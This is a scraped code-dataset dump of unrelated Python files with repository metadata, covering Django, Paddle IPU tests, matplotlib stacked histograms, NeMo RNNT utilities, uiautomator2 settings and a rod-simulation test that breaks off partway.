        # companion datasets in a composite dataset; confirm upstream usage.
        return 0

    def collater(self, samples):
        # Collate the raw indices into a 1-D tensor.
        return torch.tensor(samples)
| [
"1083127130@qq.com"
] | 1083127130@qq.com |
5a166c86274117ed654161b9db4ec8f72c03974e | d48aeeac74c02ae90d48c0994105027cee596f28 | /backend/bitter_fog_29287/wsgi.py | c1d64d470c8e7a5f73d506bb8bbeefaf596af81e | [] | no_license | crowdbotics-apps/bitter-fog-29287 | 6864b7668d09879d812d7438c580710b18c9958a | b24816c199dd45886c6ae563190fe1be731538be | refs/heads/master | 2023-07-02T14:52:19.004509 | 2021-07-30T15:43:54 | 2021-07-30T15:43:54 | 391,115,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | """
WSGI config for bitter_fog_29287 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bitter_fog_29287.settings')  # point Django at the project settings unless already configured
application = get_wsgi_application()  # module-level WSGI callable discovered by WSGI servers
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
54e745ef71add4a8f93c5f04df6b32f38c5f29c8 | ee1dc4708fe2dbff1d528baf589255d8d39e56c0 | /0x0B-python-input_output/2-main.py | 64e107c075d3ce32ecbd0133c299ffd95538ae50 | [] | no_license | agzsoftsi/holbertonschool-higher_level_programming | f267991d6a917b9fc9dbd2f639394e9585bf33b6 | 89e37450d24e200cde3b29cde20b161e75723805 | refs/heads/master | 2021-07-03T15:16:30.381714 | 2021-03-01T16:36:11 | 2021-03-01T16:36:11 | 226,884,471 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | #!/usr/bin/python3
# The module name starts with a digit, so __import__ is required instead of
# a plain import statement.
read_lines = __import__('2-read_lines').read_lines

# Demo: print the first line, the first three lines, then the whole file.
print("1 line:")
read_lines("my_file_0.txt", 1)
print("--")
print("3 lines:")
read_lines("my_file_0.txt", 3)
print("--")
print("Full content:")
read_lines("my_file_0.txt")
| [
"agzsoftsi@gmail.com"
] | agzsoftsi@gmail.com |
dabd42749c4135637d3896146d27573906923be0 | 69d8e789b289edfeb2fc18d0ef1c395bde9fb375 | /minDepth_111.py | 0366cd7558f4835563f6d3285240573c83501c3b | [] | no_license | Lucces/leetcode | d2db842eae7cdf1d7b9c56844660eb6f1940d88a | 2c3dbcbcb20cfdb276c0886e0193ef42551c5747 | refs/heads/master | 2021-01-19T05:59:04.712086 | 2016-08-29T13:33:00 | 2016-08-29T13:33:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | #!/usr/bin/env python
# coding=utf-8
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    """LeetCode 111: minimum depth of a binary tree.

    The minimum depth is the number of nodes along the shortest path from
    the root down to the nearest leaf (a node with no children).
    """

    def minDepth(self, root):
        """Return the minimum leaf depth of the tree rooted at *root*.

        :type root: TreeNode
        :rtype: int

        The original implementation tracked the answer in a module-level
        ``min_depth`` global, making the method non-reentrant; this version
        is self-contained with an internal recursive helper.
        """
        if root is None:
            return 0
        return self._min_leaf_depth(root)

    def _min_leaf_depth(self, node):
        # Depth of the nearest leaf at or below *node* (node is non-None).
        if node.left is None and node.right is None:
            return 1
        best = float("inf")
        if node.left is not None:
            best = min(best, self._min_leaf_depth(node.left))
        if node.right is not None:
            best = min(best, self._min_leaf_depth(node.right))
        return 1 + best
def inorder_tree_walk(node, depth):
    # Depth-first walk that records the shallowest leaf seen so far in the
    # module-level ``min_depth`` global.
    # NOTE(review): relies on a caller (Solution.minDepth) having initialized
    # ``min_depth`` first; calling this function directly raises NameError.
    global min_depth
    depth += 1
    # Leaf node: candidate for the minimum depth.
    if node.left == None and node.right == None:
        if depth < min_depth:
            min_depth = depth
    if node.left != None:
        inorder_tree_walk(node.left, depth)
    if node.right != None:
        inorder_tree_walk(node.right, depth)
| [
"cntqrxj@gmail.com"
] | cntqrxj@gmail.com |
a65d37fbf1e635195b611f139195ad869fb87991 | 5b34d998c7798b7cc1068680d89a977151c66c1a | /test_appium/testcase/test_search.py | eeeaf76cfc58728e01b79222be8efedc5438455b | [] | no_license | Hanlen520/Hogwarts_11 | e79a0de2508dd6801d46893271bcbc239edff3e8 | 805ee2586a25da1e710ba3acf63b5591dd76fcc6 | refs/heads/master | 2022-07-18T11:03:09.692778 | 2020-04-13T14:57:49 | 2020-04-13T14:57:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | # !/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@Project : Hogwarts_11
@File : test_search.py
@Time : 2020-03-30 10:30:18
@Author : indeyo_lin
"""
import pytest
from test_appium.page.app import App
class TestSearch:
    """Appium UI tests for the stock-search flow, driven by page objects."""

    def setup(self):
        # Fresh app session navigated to the search page before each test.
        self.page = App().start().main().goto_search()

    def test_search(self):
        # NOTE(review): asserts the live BABA quote is below 200 while the
        # parametrized test below asserts it is above 200 -- market-dependent
        # and mutually inconsistent; confirm the intended thresholds.
        price = self.page.search("alibaba").get_price("BABA")
        assert price < 200

    @pytest.mark.parametrize("stock, stock_type, price", [
        ("alibaba", "BABA", 200),
        ("JD", "JD", 20)
    ])
    def test_search_type(self, stock, stock_type, price):
        # Search each ticker and check its quote exceeds the given floor.
        assert self.page.search(stock).get_price(stock_type) > price

    def test_add_stock(self):
        # Adding a stock should surface the localized "added" toast message.
        assert "已添加" in self.page.search("alibaba").add_stock().get_msg()
"indeyo@git.com"
] | indeyo@git.com |
812800e0ba2f557721a2771d61de9304ab8789cc | 3a1be455fc5e117bd8792ed46c59793f8b29a01f | /python/paddle/fluid/tests/unittests/ipu/test_greater_op_ipu.py | 934ad1014282703a4660e25725015fa588bb379a | [
"Apache-2.0"
] | permissive | liyancas/Paddle | 42d5e7c71c37b4e63bf54e6e31e82e40aef044ce | 98303291d27cb831b19111d82793159cbe9a85ca | refs/heads/develop | 2022-05-21T03:27:16.497238 | 2022-04-01T00:52:17 | 2022-04-01T00:52:17 | 72,499,865 | 0 | 0 | Apache-2.0 | 2022-02-11T08:16:37 | 2016-11-01T03:17:41 | Python | UTF-8 | Python | false | false | 5,422 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
import paddle
import paddle.static
from paddle.fluid.tests.unittests.ipu.op_test_ipu import IPUOpTest, ExecutionMode
@unittest.skipIf(not paddle.is_compiled_with_ipu(),
                 "core is not compiled with IPU")
class TestGreaterThan(IPUOpTest):
    """IPU parity test for elementwise comparison ops.

    Builds the same static graph on CPU FP32 and on IPU (FP32 and, when
    enabled, PopART FP16), runs it for several input feeds, and checks the
    outputs agree.  Subclasses override ``set_test_op`` to swap the op.
    """

    def setUp(self):
        # Base-class hooks configure tolerances, training mode and the op.
        self.set_atol()
        self.set_training()
        self.set_test_op()

    @property
    def fp16_enabled(self):
        # Include the PopART FP16 execution mode in the sweep.
        return True

    def set_test_op(self):
        self.op = paddle.fluid.layers.greater_than

    def set_op_attrs(self):
        self.attrs = {}

    def _test_base(self, exec_mode):
        # Build and run the graph once for the given execution mode,
        # returning the fetched output array.
        scope = paddle.static.Scope()
        main_prog = paddle.static.Program()
        startup_prog = paddle.static.Program()
        main_prog.random_seed = self.SEED
        startup_prog.random_seed = self.SEED

        with paddle.static.scope_guard(scope):
            with paddle.static.program_guard(main_prog, startup_prog):
                x = paddle.static.data(
                    name=self.feed_list[0],
                    shape=self.feed_shape[0],
                    dtype='float32')
                y = paddle.static.data(
                    name=self.feed_list[1],
                    shape=self.feed_shape[1],
                    dtype='float32')
                out = self.op(x, y, **self.attrs)

                fetch_list = [out.name]

            # Choose the device for this execution mode.
            if exec_mode == ExecutionMode.CPU_FP32:
                place = paddle.CPUPlace()
            else:
                place = paddle.IPUPlace()

            exe = paddle.static.Executor(place)
            exe.run(startup_prog)

            # IPU modes compile the program through the IPU strategy;
            # FP16 additionally enables reduced precision.
            if exec_mode != ExecutionMode.CPU_FP32:
                feed_list = self.feed_list
                ipu_strategy = paddle.static.IpuStrategy()
                ipu_strategy.set_graph_config(is_training=self.is_training)
                if exec_mode == ExecutionMode.IPU_POPART_FP16:
                    ipu_strategy.set_precision_config(enable_fp16=True)
                program = paddle.static.IpuCompiledProgram(
                    main_prog,
                    ipu_strategy=ipu_strategy).compile(feed_list, fetch_list)
            else:
                program = main_prog

            # FP16 modes feed half-precision copies of the same data.
            feed = self.feed_fp32
            if exec_mode > ExecutionMode.IPU_FP32:
                feed = self.feed_fp16

            result = exe.run(program, feed=feed, fetch_list=fetch_list)
            return result[0]

    def run_test_base(self):
        # Run every execution mode and hand the collected outputs to the
        # base-class comparison (comparison results cast to int32).
        output_dict = {}
        for mode in ExecutionMode:
            if mode > ExecutionMode.IPU_FP32 and not self.fp16_enabled:
                break
            output_dict[mode] = self._test_base(mode).flatten().astype(np.int32)

        self.check(output_dict)

    def set_feed_attr(self):
        # Derive static-graph shapes and feed names from the FP32 feed.
        self.feed_shape = [x.shape for x in self.feed_fp32.values()]
        self.feed_list = list(self.feed_fp32.keys())

    def set_data_feed0(self):
        # Random same-shape operands.
        x = np.random.randn(3, 4, 5)
        y = np.random.randn(3, 4, 5)
        self.feed_fp32 = {
            "x": x.astype(np.float32),
            "y": y.astype(np.float32),
        }
        self.feed_fp16 = {
            "x": x.astype(np.float16),
            "y": y.astype(np.float16),
        }
        self.set_feed_attr()

    def set_data_feed1(self):
        # Broadcast case: (1, 10) against (10,).
        x = np.ones([1, 10])
        y = np.ones([10])
        self.feed_fp32 = {"x": x.astype(np.float32), "y": y.astype(np.float32)}
        self.feed_fp16 = {"x": x.astype(np.float16), "y": y.astype(np.float16)}
        self.set_feed_attr()

    def set_data_feed2(self):
        # All-true / all-false extreme: ones vs zeros.
        x = np.ones([1, 10])
        y = np.zeros([1, 10])
        self.feed_fp32 = {"x": x.astype(np.float32), "y": y.astype(np.float32)}
        self.feed_fp16 = {"x": x.astype(np.float16), "y": y.astype(np.float16)}
        self.set_feed_attr()

    def set_data_feed3(self):
        # Mirror of feed2: zeros vs ones.
        x = np.zeros([1, 10])
        y = np.ones([1, 10])
        self.feed_fp32 = {"x": x.astype(np.float32), "y": y.astype(np.float32)}
        self.feed_fp16 = {"x": x.astype(np.float16), "y": y.astype(np.float16)}
        self.set_feed_attr()

    def test_case0(self):
        self.set_data_feed0()
        self.set_op_attrs()
        self.run_test_base()

    def test_case1(self):
        self.set_data_feed1()
        self.set_op_attrs()
        self.run_test_base()

    def test_case2(self):
        self.set_data_feed2()
        self.set_op_attrs()
        self.run_test_base()

    def test_case3(self):
        self.set_data_feed3()
        self.set_op_attrs()
        self.run_test_base()
class TestLessThan(TestGreaterThan):
    """Same harness as TestGreaterThan with the less_than op swapped in."""

    def set_test_op(self):
        self.op = paddle.fluid.layers.less_than
class TestEqual(TestGreaterThan):
    """Same harness as TestGreaterThan with the equal op swapped in."""

    def set_test_op(self):
        self.op = paddle.fluid.layers.equal


if __name__ == "__main__":
    unittest.main()
| [
"noreply@github.com"
] | liyancas.noreply@github.com |
3d8f2df75d1761a1b24f57e53f4640e6fa499b23 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_117/ch27_2019_03_08_12_32_17_139310.py | beac39a68b2338e79d5a49e9521b451eff51529b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | cigarros=int(input("quantos cigarros fuma por dia?"))
anos=int(input("quantos anos?"))
Tempo_de_vida_perdido=((int(cigarros)*365)*int(anos))*10
print (Tempo_de_vida_perdido)
| [
"you@example.com"
] | you@example.com |
ebdec2b196300b6b5d65b0d2260ebb5f1d6fe028 | 7889f7f0532db6a7f81e6f8630e399c90438b2b9 | /1.5.0/mpl_examples/api/filled_step.py | 42d61dc917668293fb8e7bf059ba464eed8925e2 | [] | no_license | matplotlib/matplotlib.github.com | ef5d23a5bf77cb5af675f1a8273d641e410b2560 | 2a60d39490941a524e5385670d488c86083a032c | refs/heads/main | 2023-08-16T18:46:58.934777 | 2023-08-10T05:07:57 | 2023-08-10T05:08:30 | 1,385,150 | 25 | 59 | null | 2023-08-30T15:59:50 | 2011-02-19T03:27:35 | null | UTF-8 | Python | false | false | 6,444 | py | import itertools
from functools import partial
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
from cycler import cycler
from six.moves import zip
def filled_hist(ax, edges, values, bottoms=None, orientation='v',
**kwargs):
"""
Draw a histogram as a stepped patch.
Extra kwargs are passed through to `fill_between`
Parameters
----------
ax : Axes
The axes to plot to
edges : array
A length n+1 array giving the left edges of each bin and the
right edge of the last bin.
values : array
A length n array of bin counts or values
bottoms : scalar or array, optional
A length n array of the bottom of the bars. If None, zero is used.
orientation : {'v', 'h'}
Orientation of the histogram. 'v' (default) has
the bars increasing in the positive y-direction.
Returns
-------
ret : PolyCollection
Artist added to the Axes
"""
print(orientation)
if orientation not in set('hv'):
raise ValueError("orientation must be in {'h', 'v'} "
"not {o}".format(o=orientation))
kwargs.setdefault('step', 'post')
edges = np.asarray(edges)
values = np.asarray(values)
if len(edges) - 1 != len(values):
raise ValueError('Must provide one more bin edge than value not: '
'len(edges): {lb} len(values): {lv}'.format(
lb=len(edges), lv=len(values)))
if bottoms is None:
bottoms = np.zeros_like(values)
if np.isscalar(bottoms):
bottoms = np.ones_like(values) * bottoms
values = np.r_[values, values[-1]]
bottoms = np.r_[bottoms, bottoms[-1]]
if orientation == 'h':
return ax.fill_betweenx(edges, values, bottoms, **kwargs)
elif orientation == 'v':
return ax.fill_between(edges, values, bottoms, **kwargs)
else:
raise AssertionError("you should never be here")
def stack_hist(ax, stacked_data, sty_cycle, bottoms=None,
               hist_func=None, labels=None,
               plot_func=None, plot_kwargs=None):
    """
    Draw stacked histograms of several data sets onto *ax*.

    Parameters
    ----------
    ax : axes.Axes
        The axes to add artists too

    stacked_data : array or Mapping
        A (N, M) shaped array.  The first dimension will be iterated over to
        compute histograms row-wise

    sty_cycle : Cycler or operable of dict
        Style to apply to each set

    bottoms : array, optional
        The initial positions of the bottoms, defaults to 0

    hist_func : callable, optional
        Must have signature `bin_vals, bin_edges = f(data)`.
        `bin_edges` expected to be one longer than `bin_vals`

    labels : list of str, optional
        The label for each set.

        If not given and stacked data is an array defaults to 'default set {n}'

        If stacked_data is a mapping, and labels is None, default to the keys
        (which may come out in a random order).

        If stacked_data is a mapping and labels is given then only
        the columns listed by be plotted.

    plot_func : callable, optional
        Function to call to draw the histogram must have signature:

          ret = plot_func(ax, edges, top, bottoms=bottoms,
                          label=label, **kwargs)

    plot_kwargs : dict, optional
        Any extra kwargs to pass through to the plotting function.  This
        will be the same for all calls to the plotting function and will
        over-ride the values in cycle.

    Returns
    -------
    arts : dict
        Dictionary of artists keyed on their labels
    """
    # deal with default binning function
    if hist_func is None:
        hist_func = np.histogram

    # deal with default plotting function
    if plot_func is None:
        plot_func = filled_hist

    # deal with default
    if plot_kwargs is None:
        plot_kwargs = {}

    # Mapping input iterates (data, label) pairs keyed by `labels`;
    # array input iterates rows, synthesizing labels when needed.
    try:
        l_keys = stacked_data.keys()
        label_data = True
        if labels is None:
            labels = l_keys

    except AttributeError:
        label_data = False
        if labels is None:
            labels = itertools.repeat(None)

    if label_data:
        loop_iter = enumerate((stacked_data[lab], lab, s) for lab, s in
                              zip(labels, sty_cycle))
    else:
        loop_iter = enumerate(zip(stacked_data, labels, sty_cycle))

    arts = {}
    for j, (data, label, sty) in loop_iter:
        # Copy the style so pop/update below never mutate the caller's
        # cycle entries (the original mutated plain dict inputs in place,
        # and also left several debug print() calls here).
        sty = dict(sty)
        if label is None:
            label = 'dflt set {n}'.format(n=j)
        label = sty.pop('label', label)
        vals, edges = hist_func(data)
        if bottoms is None:
            bottoms = np.zeros_like(vals)
        top = bottoms + vals
        # plot_kwargs wins over the per-set style on key collisions.
        sty.update(plot_kwargs)
        ret = plot_func(ax, edges, top, bottoms=bottoms,
                        label=label, **sty)
        bottoms = top
        arts[label] = ret
    ax.legend(fontsize=10)
    return arts
# set up histogram function to fixed bins (20 edges over [-3, 3], shared by
# every call so the stacked sets line up)
edges = np.linspace(-3, 3, 20, endpoint=True)
hist_func = partial(np.histogram, bins=edges)
# set up style cycles (facecolor / label / hatch per data set)
color_cycle = cycler('facecolor', 'rgbm')
label_cycle = cycler('label', ['set {n}'.format(n=n) for n in range(4)])
hatch_cycle = cycler('hatch', ['/', '*', '+', '|'])
# make some synthetic data (NOTE: unseeded, so figures differ run to run)
stack_data = np.random.randn(4, 12250)
dict_data = {lab: d for lab, d in zip(list(c['label'] for c in label_cycle),
                                      stack_data)}
# work with plain arrays: vertical stack on ax1, horizontal on ax2
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 4.5), tight_layout=True)
arts = stack_hist(ax1, stack_data, color_cycle + label_cycle + hatch_cycle,
                  hist_func=hist_func)
arts = stack_hist(ax2, stack_data, color_cycle,
                  hist_func=hist_func,
                  plot_kwargs=dict(edgecolor='w', orientation='h'))
ax1.set_ylabel('counts')
ax1.set_xlabel('x')
ax2.set_xlabel('counts')
ax2.set_ylabel('x')
# work with labeled data: all sets on ax1, a labeled subset on ax2
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 4.5),
                               tight_layout=True, sharey=True)
arts = stack_hist(ax1, dict_data, color_cycle + hatch_cycle,
                  hist_func=hist_func)
arts = stack_hist(ax2, dict_data, color_cycle + hatch_cycle,
                  hist_func=hist_func, labels=['set 0', 'set 3'])
ax1.xaxis.set_major_locator(mticker.MaxNLocator(5))
ax1.set_xlabel('counts')
ax1.set_ylabel('x')
ax2.set_ylabel('x')
| [
"quantum.analyst@gmail.com"
] | quantum.analyst@gmail.com |
d8d1483f9f79e9e32c3b1a3028bd7eea445cce5b | b2cefb7a2a83aa93ee1b15a780b5ddf6c498215b | /nemo/collections/asr/parts/utils/rnnt_utils.py | 4b91eace8ad6f61848e401d3efd980c132c03d99 | [
"Apache-2.0"
] | permissive | VahidooX/NeMo | bfde8c9b48c818342a9c6290fb9dee62fafeca38 | 866cc3f66fab3a796a6b74ef7a9e362c2282a976 | refs/heads/main | 2023-07-23T19:13:39.948228 | 2022-04-29T21:51:54 | 2022-04-29T21:51:54 | 227,733,473 | 1 | 2 | Apache-2.0 | 2022-09-15T15:30:13 | 2019-12-13T01:55:21 | Jupyter Notebook | UTF-8 | Python | false | false | 5,863 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2017 Johns Hopkins University (Shinji Watanabe)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Tuple, Union
import torch
@dataclass
class Hypothesis:
    """Hypothesis class for beam search algorithms.

    score: A float score obtained from an AbstractRNNTDecoder module's score_hypothesis method.

    y_sequence: Either a sequence of integer ids pointing to some vocabulary, or a packed torch.Tensor
        behaving in the same manner. dtype must be torch.Long in the latter case.

    dec_state: A list (or list of list) of LSTM-RNN decoder states. Can be None.

    text: (Optional) A decoded string after processing via CTC / RNN-T decoding (removing the CTC/RNNT
        `blank` tokens, and optionally merging word-pieces). Should be used as decoded string for
        Word Error Rate calculation.

    timestep: (Optional) A list of integer indices representing at which index in the decoding
        process did the token appear. Should be of same length as the number of non-blank tokens.

    alignments: (Optional) Represents the CTC / RNNT token alignments as integer tokens along an axis of
        time T (for CTC) or Time x Target (TxU).
        For CTC, represented as a single list of integer indices.
        For RNNT, represented as a dangling list of list of integer indices.
        Outer list represents Time dimension (T), inner list represents Target dimension (U).
        The set of valid indices **includes** the CTC / RNNT blank token in order to represent alignments.

    length: Represents the length of the sequence (the original length without padding), otherwise
        defaults to 0.

    y: (Unused) A list of torch.Tensors representing the list of hypotheses.

    lm_state: (Unused) A dictionary state cache used by an external Language Model.

    lm_scores: (Unused) Score of the external Language Model.

    tokens: (Optional) A list of decoded tokens (can be characters or word-pieces).

    last_token: (Optional) A token or batch of tokens which was predicted in the last step.
    """

    score: float
    y_sequence: Union[List[int], torch.Tensor]
    text: Optional[str] = None
    dec_out: Optional[List[torch.Tensor]] = None
    dec_state: Optional[Union[List[List[torch.Tensor]], List[torch.Tensor]]] = None
    timestep: Union[List[int], torch.Tensor] = field(default_factory=list)
    alignments: Optional[Union[List[int], List[List[int]]]] = None
    length: Union[int, torch.Tensor] = 0
    # NOTE(review): annotation fixed — the original wrote `List[torch.tensor]`, but
    # `torch.tensor` is the factory function; the type is `torch.Tensor`, and the
    # default is None, so the field is Optional.
    y: Optional[List[torch.Tensor]] = None
    lm_state: Optional[Union[Dict[str, Any], List[Any]]] = None
    lm_scores: Optional[torch.Tensor] = None
    tokens: Optional[Union[List[int], torch.Tensor]] = None
    last_token: Optional[torch.Tensor] = None
@dataclass
class NBestHypotheses:
    """List of N best hypotheses produced for a single utterance by beam search."""

    # Candidate hypotheses for one sample; may be None.
    n_best_hypotheses: Optional[List[Hypothesis]]
def is_prefix(x: List[int], pref: List[int]) -> bool:
    """
    Obtained from https://github.com/espnet/espnet.

    Check if pref is a (strictly shorter) prefix of x.

    Args:
        x: Label ID sequence.
        pref: Prefix label ID sequence.

    Returns:
        : Whether pref is a prefix of x.
    """
    # A sequence is only considered a prefix when it is strictly shorter than x
    # and every position matches element-wise.
    return len(pref) < len(x) and all(p == xi for p, xi in zip(pref, x))
def select_k_expansions(
    hyps: List[Hypothesis], logps: torch.Tensor, beam_size: int, gamma: float, beta: int,
) -> List[Tuple[int, Hypothesis]]:
    """
    Obtained from https://github.com/espnet/espnet

    Return K hypotheses candidates for expansion from a list of hypothesis.
    K candidates are selected according to the extended hypotheses probabilities
    and a prune-by-value method. Where K is equal to beam_size + beta.

    Args:
        hyps: Hypotheses.
        logps: Log-probabilities for hypotheses expansions.
        beam_size: Beam size.
        gamma: Allowed logp difference for prune-by-value method.
        beta: Number of additional candidates to store.

    Return:
        k_expansions: Best K expansion hypotheses candidates.
    """
    k_expansions = []
    for i, hyp in enumerate(hyps):
        # Score every vocabulary token as a candidate extension of this hypothesis.
        candidates = [(int(token), hyp.score + float(logp)) for token, logp in enumerate(logps[i])]
        best_token, best_score = max(candidates, key=lambda kv: kv[1])
        # Prune-by-value: drop candidates scoring more than `gamma` below the best,
        # then keep at most beam_size + beta of the survivors (stable sort by score).
        survivors = [kv for kv in candidates if kv[1] >= best_score - gamma]
        survivors.sort(key=lambda kv: kv[1])
        survivors = survivors[: beam_size + beta]
        # Guarantee at least one expansion per hypothesis (the best-scoring one).
        k_expansions.append(survivors if survivors else [(best_token, best_score)])
    return k_expansions
| [
"noreply@github.com"
] | VahidooX.noreply@github.com |
72c20e2df29fcea30fe8377b3aafcd9722b96b2b | ef3ac1664accfe2f4f28800cb3dde383d04e2636 | /max len when alternating num are even and odd.py | 92e25b7c837f76ffaa71f84ffb3a4f3bebd3ae18 | [] | no_license | Shamabanu/python | 2466b253ead7249147844e22ede9017a2ffb299a | 76350525586b285773edb58912c1ba8eee35d1a6 | refs/heads/master | 2020-03-27T15:45:09.838053 | 2019-08-14T15:06:18 | 2019-08-14T15:06:18 | 146,736,750 | 3 | 6 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | num=input()
def _longest_alternating_parity_length(digits):
    """Return the length of the longest contiguous run of digits in which
    adjacent digits alternate between even and odd (each adjacent pair
    sums to an odd number).

    Matches the original script's output convention: 0 when no adjacent
    pair alternates, otherwise (number of alternating pairs in the run) + 1.
    """
    best = 0
    run = 0
    for left, right in zip(digits, digits[1:]):
        if (int(left) + int(right)) % 2 != 0:
            # Parities differ across this pair; the run continues.
            run += 1
        else:
            best = max(best, run)
            run = 0
    best = max(best, run)
    return 0 if best == 0 else best + 1


# `num` is read from stdin on the preceding line; print the answer as before.
print(_longest_alternating_parity_length(num))
| [
"noreply@github.com"
] | Shamabanu.noreply@github.com |
02fe935d53fe2979fae0f6a73cfa11bc96de96d4 | 52d73c4b6ad70b62000d9d01e3dbab94f1edcb39 | /uiautomator2/settings.py | 7c6aea22b08ddeefc1661a927266e822bf257347 | [
"MIT"
] | permissive | zenjan1/uiautomator2 | ff50abae9bfe7430aea77bbf4431eab472153a8c | 907ea86099719edaec14f802f5182f1a8b359840 | refs/heads/master | 2022-06-04T06:44:07.467582 | 2020-05-03T07:17:14 | 2020-05-03T07:17:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | # coding: utf-8
#
import json
import logging
import pprint
from typing import Any
class Settings(object):
    """Mutable key/value configuration store with per-key type checking.

    The set of valid keys is fixed by ``_defaults``; assigning an unknown key
    raises AttributeError, and assigning a value of the wrong type raises
    TypeError.  Supports both ``settings.set(k, v)`` / ``settings.get(k)`` and
    dict-style ``settings[k]`` access.
    """

    def __init__(self, d):
        # `d` is the owning object (presumably the device/driver — TODO confirm);
        # it is stored but not used by this class itself.
        self._d = d
        self._defaults = {
            "post_delay": 0,  # Deprecated
            "wait_timeout": 20.0,
            "xpath_debug": False,  # self._set_xpath_debug,
            "uiautomator_runtest_app_background": True,
            "click_after_delay": 0.2,
            "click_before_delay": 0.2,
        }
        # Accepted value type(s) for each key; numeric settings allow float or int.
        self._props = {
            "post_delay": (float, int),
            "xpath_debug": bool,
        }
        # Derive accepted types for the remaining keys from their default values.
        for k, v in self._defaults.items():
            if k not in self._props:
                self._props[k] = (float, int) if type(v) in (float, int) else type(v)

    def get(self, key: str) -> Any:
        """Return the current value for `key`, or None if the key is unknown."""
        return self._defaults.get(key)

    def set(self, key: str, val: Any):
        """Set `key` to `val`.

        Raises:
            AttributeError: if `key` is not a known setting.
            TypeError: if `val` is not of the accepted type(s) for `key`.
        """
        if key not in self._props:
            raise AttributeError("invalid attribute", key)
        if not isinstance(val, self._props[key]):
            # NOTE: a leftover debug print of (key, props) was removed here.
            raise TypeError("invalid type, only accept: %r" % self._props[key])
        # If the stored entry is callable it acts as a setter hook and is invoked
        # with the new value before the value replaces it.
        callback = self._defaults[key]
        if callable(callback):
            callback(val)
        self._defaults[key] = val

    def __setitem__(self, key: str, val: Any):
        self.set(key, val)

    def __getitem__(self, key: str) -> Any:
        if key not in self._defaults:
            raise RuntimeError("invalid key", key)
        return self.get(key)

    def __repr__(self):
        return pprint.pformat(self._defaults)
        # return self._defaults
# if __name__ == "__main__":
# settings = Settings(None)
# settings.set("pre_delay", 10)
# print(settings['pre_delay'])
# settings["post_delay"] = 10
| [
"codeskyblue@gmail.com"
] | codeskyblue@gmail.com |
1735958f710b4c8ae98f9c5ce173e0ec8d124e60 | 2339a41252821d69b808d15f22a8b5913838392e | /Rod/test_MCCD.py | d066b8a1807df9c72a6e9034adc23eb8798f56f3 | [] | no_license | xinyazhang/tfhair | 26d7c3e059e55dd6f51b6138f6e842ffce10e58f | a17df7d81cb9baf170a965ccc530f48582d60b62 | refs/heads/master | 2021-06-18T14:21:29.004713 | 2017-05-06T19:40:21 | 2017-05-06T19:40:21 | 87,961,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,524 | py | #!/usr/bin/env python2
'''
Test for Motions
'''
import numpy as np
from ElasticRod import *
import RodHelper as helper
import tensorflow as tf
import math
from math import pi
import progressbar
def run_with_bc(n, h, rho, icond, path, icond_updater=None):
'''
Run the simulation with given boundary conditions (icond)
'''
if icond.ccd_threshold is None:
icond.ccd_threshold = 30.0
tf.reset_default_graph()
irod = helper.create_TFRodS(2, n)
irod.clone_args_from(icond)
if icond.sparse_anchor_indices is not None:
irod.sparse_anchor_indices = tf.placeholder(tf.int32, shape=[None, 2])
irod.sparse_anchor_values = tf.placeholder(tf.float32, shape=[None, 3])
orod = irod.CalcNextRod(h)
rrod = orod.CalcPenaltyRelaxationTF(h)
''' Hack: This check collision b/w Rod 0 Seg # and Rod 1 Seg # '''
# rrod.sela = tf.constant(np.array([[0, i] for i in range(n)]), dtype=tf.int32)
# rrod.selb = tf.constant(np.array([[1, i] for i in range(n)]), dtype=tf.int32)
rrod = rrod.CreateCCDNode(irod, h)
# TODO: Calulate SelS in ElasticRodS directly.
# sela_data = np.array([[0, i] for i in range(n)])
# selb_data = np.array([[1, i] for i in range(n)])
# pfe = TFGetEConstaint(irod)
